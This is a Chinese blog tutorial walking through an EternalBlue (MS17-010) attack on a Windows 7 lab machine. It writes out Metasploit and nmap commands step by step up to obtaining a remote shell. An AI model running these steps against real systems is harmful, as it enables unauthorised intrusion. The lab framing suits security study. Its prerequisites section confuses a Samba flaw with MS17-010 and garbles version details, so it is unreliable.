永恒之蓝windows7 下的渗透测试
漏洞介绍
永恒之蓝是影子经纪人黑客组织攻破美国NSA黑客组织后公布的漏洞工具之一。
2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和*机构专网中招,被勒索支付高额赎金才能解密恢复文件。
代号 MS17-010
window版本为(windowsxp-windows server20012)
这里的测试版为windows7 企业版,运用工具msf,namp.
测试攻击机为kali linux ,测试机为windows7 旗舰版
linux版本下还没测试,稍后补上。
实现条件
- 部署了存在漏洞的samba协议的版本,并对外开启445端口
- 匿名访问用户对文件有可读权限
- 需要知道共享目录的物理漏洞
过程如下
首先打开kali下的msfconsole
msfconsole
search 17-010
可能会出现如下的情况
Module database cache not built yet, using slow search
执行如下三条命令
aaa@qq.com:~# service postgresql start
aaa@qq.com:~# msfdb init
msf > db_rebuild_cache
我们使用下面的ms17_010_eternalblue
msf>use exploit/windows/smb/ms17_010_eternalblue
亲测上面的smb_ms17_010 拿不到shell
查看下命令的参数
show options
查看到必须配置的参数为主机名称,和主机开放445 端口,可以用nmap扫描目标是否开放了445端口
nmap 192.168.28.131 -p 445
可以看到,端口开放,可以测试主机
set RHOST 192.168.28.131
再次查看参数,主机已经添加成功
开始测试
run
成功拿到shell,为所欲为
由于linux下使用utf-8编码,而windows使用的是gbk,所以,我们对kali设置语言编码
export LANG=zh_CN.GBK
重启kali.
上一篇: 设计模式8之(命令模式)
下一篇: 命令模式
推荐阅读